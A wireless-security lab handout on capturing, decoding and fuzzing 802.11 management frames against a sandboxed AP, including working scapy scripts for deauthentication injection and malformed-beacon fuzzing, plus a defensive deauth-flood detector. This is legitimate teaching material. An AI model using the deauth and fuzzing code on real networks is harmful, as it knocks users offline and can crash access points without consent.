Lab 3: 802.11 Management-Frame Fuzzing

Chapter: 3 (Week 4)
Duration: 3 hr
Substrate: Alfa AWUS036ACM in monitor mode + Python/scapy + sandboxed lab AP
Points: 8


Overview

Capture, analyse, and fuzz 802.11 management frames against an instructor-controlled sandboxed AP. All active injection work is performed on the instructor-isolated lab network; no transmit operations target any production or third-party infrastructure.


Authorization (required before proceeding)

  • Lab AP is the instructor-assigned lab target (SSID and BSSID provided by instructor)
  • I am operating on the isolated lab network (no internet-facing AP)
  • My Alfa NIC is in monitor mode only for passive capture; I will only inject on the instructor's authorization
  • I will not deauthenticate any clients except the instructor-controlled lab client

Part 1: Passive 802.11 Frame Collection (45 min)

Enable monitor mode on the Alfa NIC and capture 2 minutes of traffic near the lab AP:

sudo airmon-ng start wlan0
sudo airodump-ng wlan0mon --bssid <lab-AP-BSSID> -c <channel> -w lab3-capture

Load the capture in Wireshark. Apply display filters and answer:

  1. How many unique client MAC addresses are associated with the lab AP?
  2. What security mode is advertised in the RSN IE of the AP's beacons? (Filter: wlan.fc.type_subtype == 0x0008)
  3. Does the AP advertise 802.11w (MFP)? Look for the RSN Capabilities field in the RSN IE. The MFP-capable bit is bit 7 (0x0080 in the Capabilities field).
  4. What data rates does the AP advertise? (Supported Rates IE in the beacon)

Part 2: Frame-Level Analysis with scapy (45 min)

from collections import Counter

from scapy.all import rdpcap
from scapy.layers.dot11 import Dot11, Dot11Beacon, Dot11Elt, Dot11ProbeReq

# airodump-ng appends a sequence number to the -w prefix, hence lab3-capture-01.cap
frames = rdpcap("lab3-capture-01.cap")

# Frame type breakdown (type 0 = management, 1 = control, 2 = data)
type_subtype = []
for f in frames:
    if f.haslayer(Dot11):
        t = f[Dot11].type
        s = f[Dot11].subtype
        type_subtype.append(f"type={t} subtype={s}")

for item, count in Counter(type_subtype).most_common(15):
    print(f"  {item:30s}: {count}")

# RSN IE analysis from the first beacon: walk the chain of information elements
for f in frames:
    if f.haslayer(Dot11Beacon):
        ie = f[Dot11Elt]
        while isinstance(ie, Dot11Elt):
            if ie.ID == 48:  # RSN Information Element ID = 48
                print("RSN IE raw bytes:", ie.info.hex())
                break
            ie = ie.payload  # the next element; NoPayload ends the loop
        break  # just the first beacon

# Probe requests in the capture: which SSIDs is each client looking for?
probes = {}
for f in frames:
    if f.haslayer(Dot11ProbeReq) and f.haslayer(Dot11Elt):
        src = f[Dot11].addr2
        ie = f[Dot11Elt]
        if ie.ID != 0:  # the first element should be the SSID (ID 0); skip malformed frames
            continue
        # an empty SSID is a wildcard (broadcast) probe
        ssid = ie.info.decode('utf-8', errors='replace') or "<wildcard>"
        probes.setdefault(src, set()).add(ssid)

print("\nProbe requests observed:")
for mac, ssids in probes.items():
    print(f"  {mac}: {sorted(ssids)}")
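
To turn the raw RSN IE hex printed above into the answers Part 1 asks for (security mode in question 2, MFP status in question 3), the following decoder is an added example for this handout, not one of the lab's own scripts. It uses only the standard library and works on the bytes scapy exposes as Dot11Elt.info; the sample IE at the bottom is constructed, and the Capabilities field is treated as optional because an AP that omits it advertises no MFP.

```python
import struct

# Suite selectors under OUI 00-0F-AC (IEEE 802.11 RSNE cipher-suite and AKM-suite tables)
RSN_OUI = b"\x00\x0f\xac"
CIPHERS = {0: "use-group", 1: "WEP-40", 2: "TKIP", 4: "CCMP-128", 5: "WEP-104",
           6: "BIP-CMAC-128", 8: "GCMP-128", 9: "GCMP-256", 10: "CCMP-256"}
AKMS = {1: "802.1X", 2: "PSK", 3: "FT-802.1X", 4: "FT-PSK", 5: "802.1X-SHA256",
        6: "PSK-SHA256", 8: "SAE", 9: "FT-SAE", 11: "SuiteB-802.1X", 12: "SuiteB-192", 18: "OWE"}
MFPR, MFPC = 0x0040, 0x0080   # RSN Capabilities: bit 6 = MFP required, bit 7 = MFP capable

def _suite_name(sel, table):
    # A selector is OUI (3 bytes) + suite type (1 byte); other OUIs are vendor-specific
    if len(sel) != 4:
        raise ValueError("truncated suite selector")
    return table.get(sel[3], f"reserved-{sel[3]}") if sel[:3] == RSN_OUI else f"vendor-{sel.hex()}"

def parse_rsn_ie(info):
    """Decode the body of an RSN IE (element ID 48): the bytes scapy exposes as Dot11Elt.info."""
    if len(info) < 6:
        raise ValueError("RSN IE too short for version + group cipher")
    out = {"version": struct.unpack_from("<H", info, 0)[0], "group_cipher": _suite_name(info[2:6], CIPHERS),
           "pairwise": [], "akm": [], "capabilities": None, "mfp_capable": False, "mfp_required": False}
    off = 6
    for key, table in (("pairwise", CIPHERS), ("akm", AKMS)):
        if off + 2 > len(info):   # list omitted: the element ends here
            return out
        count = struct.unpack_from("<H", info, off)[0]
        off += 2
        for _ in range(count):
            out[key].append(_suite_name(info[off:off + 4], table))
            off += 4
    if off + 2 <= len(info):      # Capabilities is optional; when absent the AP offers no MFP
        caps = struct.unpack_from("<H", info, off)[0]
        out.update(capabilities=caps, mfp_capable=bool(caps & MFPC), mfp_required=bool(caps & MFPR))
    return out

_LABELS = (({"SAE", "FT-SAE"}, "WPA3-Personal"), ({"PSK", "PSK-SHA256", "FT-PSK"}, "WPA2-Personal"),
           ({"802.1X", "802.1X-SHA256", "FT-802.1X", "SuiteB-802.1X", "SuiteB-192"}, "WPA2-Enterprise"),
           ({"OWE"}, "Enhanced Open"))

def security_mode(parsed):
    """Label of the kind Part 1 asks for: WPA generation(s), pairwise cipher(s), MFP status."""
    akm = set(parsed["akm"])
    label = "/".join(name for suites, name in _LABELS if akm & suites) or "unknown"  # mixed = transition
    mfp = "required" if parsed["mfp_required"] else "optional" if parsed["mfp_capable"] else "disabled"
    return f"{label}, pairwise {'/'.join(parsed['pairwise']) or 'n/a'}, MFP {mfp}"

# Constructed sample RSN IE body: WPA2-PSK, CCMP-128, Capabilities 0x0080 (MFP capable, optional)
SAMPLE_RSN = bytes.fromhex("0100000fac040100000fac040100000fac028000")
```

Feed the hex string your Part 2 script prints to bytes.fromhex() in place of SAMPLE_RSN; a result of "MFP disabled" or "MFP optional" is the input for the Part 3 and deliverables analysis.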

Part 3: Deauth Injection (instructor authorisation required before this step)

Send 10 deauthentication frames to the instructor-controlled lab client:

from scapy.layers.dot11 import Dot11, Dot11Deauth, RadioTap
from scapy.sendrecv import sendp

# Values provided by instructor
AP_BSSID    = "AA:BB:CC:DD:EE:FF"   # replace with actual
CLIENT_MAC  = "11:22:33:44:55:66"   # replace with actual
IFACE       = "wlan0mon"

deauth = (
    RadioTap() /
    Dot11(type=0, subtype=12,
          addr1=CLIENT_MAC,
          addr2=AP_BSSID,
          addr3=AP_BSSID) /
    Dot11Deauth(reason=7)
)

sendp(deauth, iface=IFACE, count=10, inter=0.1, verbose=1)

Capture the result with Wireshark running on a second terminal. Document:

  1. Was the deauth successful? (Did the client re-associate after the deauth flood?)
  2. Does the AP have 802.11w (MFP) enabled? (If yes, explain why the deauth did or did not still work.)
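
For documenting the Part 3 result from the second-terminal capture, here is an added, defender-side example (not part of the handout) of the check a wireless IDS performs: a sliding-window count of deauth/disassoc frames per transmitter, plus a look for the client's re-association request afterwards. It works on plain dicts summarising frames, so the capture below is constructed inline; the MAC addresses reuse the handout's placeholders.

```python
from collections import defaultdict

# 802.11 management subtypes (type 0) referenced in Part 3
SUBTYPE_ASSOC_REQ, SUBTYPE_REASSOC_REQ = 0, 2
SUBTYPE_DISASSOC, SUBTYPE_DEAUTH = 10, 12

def detect_deauth_flood(frames, window=1.0, threshold=5):
    """Flag each transmitter that sends >= threshold deauth/disassoc frames inside any
    `window`-second span. frames: dicts with ts, subtype, addr1 (receiver), addr2
    (transmitter), reason and protected (802.11 Protected Frame bit). With 802.11w
    negotiated, a client discards the unprotected ones, so `unprotected` is what matters."""
    by_src = defaultdict(list)
    for f in sorted(frames, key=lambda f: f["ts"]):
        if f["subtype"] in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH):
            by_src[f["addr2"]].append(f)
    alerts = []
    for src, lst in by_src.items():
        start, peak = 0, 0
        for end, f in enumerate(lst):          # sliding window over this source's frames
            while f["ts"] - lst[start]["ts"] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts.append({"src": src, "peak_per_window": peak, "total": len(lst),
                           "targets": sorted({f["addr1"] for f in lst}),
                           "reasons": sorted({f["reason"] for f in lst}),
                           "unprotected": sum(1 for f in lst if not f["protected"])})
    return alerts

def reassociated_after(frames, client, t):
    """Part 3, question 1: did `client` send an (Re)Association Request after time t?"""
    return any(f["ts"] > t and f["addr2"] == client
               and f["subtype"] in (SUBTYPE_ASSOC_REQ, SUBTYPE_REASSOC_REQ) for f in frames)

def _mgmt(ts, subtype, addr1, addr2, reason=None, protected=False):
    return {"ts": ts, "subtype": subtype, "addr1": addr1, "addr2": addr2,
            "reason": reason, "protected": protected}

AP, CLIENT, OTHER = "AA:BB:CC:DD:EE:FF", "11:22:33:44:55:66", "DE:AD:BE:EF:00:01"

# Constructed capture summary (not from a real pcap): a Part 3-style burst of ten unprotected
# deauths at 0.1 s spacing with reason 7, beacons, one benign disassoc from another station
# (reason 8, leaving), and the client re-associating half a second after the burst ends.
SAMPLE_FRAMES = (
    [_mgmt(100.0 + i / 10, SUBTYPE_DEAUTH, CLIENT, AP, reason=7) for i in range(10)]
    + [_mgmt(100.0 + i / 10, 8, "FF:FF:FF:FF:FF:FF", AP) for i in range(20)]
    + [_mgmt(100.3, SUBTYPE_DISASSOC, AP, OTHER, reason=8),
       _mgmt(101.4, SUBTYPE_ASSOC_REQ, AP, CLIENT)]
)
```

On a real capture, build the frame dicts from each Dot11 layer's time, subtype, addr1, addr2, reason (Dot11Deauth) and the FCfield protected flag; a burst that the client nevertheless ignores is what an MFP-enabled association looks like in this check.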

Part 4: Beacon Fuzzing (limited; instructor-authorized)

Generate five mutated beacon frames with malformed SSID IEs and observe AP/client behavior:

import random
from scapy.layers.dot11 import Dot11, Dot11Beacon, Dot11Elt, RadioTap
from scapy.sendrecv import sendp

AP_BSSID = "AA:BB:CC:DD:EE:FF"
IFACE = "wlan0mon"

def fuzz_ssid_ie(bssid, ssid_len, iface):
    ssid_content = bytes([random.randint(0, 255) for _ in range(ssid_len)])
    pkt = (
        RadioTap() /
        Dot11(type=0, subtype=8,
              addr1="ff:ff:ff:ff:ff:ff",
              addr2=bssid, addr3=bssid) /
        Dot11Beacon(cap=0x2105) /
        Dot11Elt(ID=0, info=ssid_content) /
        Dot11Elt(ID=1, info=b"\x82\x84\x8b\x96")
    )
    sendp(pkt, iface=iface, count=1, verbose=0)

for test_len in [0, 32, 64, 128, 255]:
    print(f"Sending beacon with SSID IE length={test_len}")
    fuzz_ssid_ie(AP_BSSID, test_len, IFACE)

Monitor the AP log (instructor-provided console access) and Wireshark for:

  • Unexpected frames from the AP in response
  • AP crash or restart indicators
  • Client disconnection events

Virtual Path

Students without a monitor-mode NIC or sandboxed AP complete Parts 1-2 using the pre-captured PCAP lab3-80211-mgmt.pcapng. Parts 3-4 (active injection) require physical hardware; document the expected behavior from the Week 4 lecture notes instead of live execution.


Deliverables

  • Wireshark screenshot: beacon frame with RSN IE visible and expanded
  • scapy output: frame-type frequency table + RSN IE hex + probe-request list
  • Deauth injection result: screenshot + description (was the client deauthenticated? did it reassociate?)
  • Fuzzing result: did the AP produce any unexpected response to malformed SSID IEs?
  • 1-paragraph security analysis: what does the 802.11w (MFP) status of the lab AP tell you about its deauth-flood resistance?

Grading (8 points)

Item                                                   Points
Beacon RSN IE analysis (security mode + MFP status)         2
scapy frame-type analysis with correct output               2
Deauth experiment + result documented                       2
Security analysis paragraph                                 2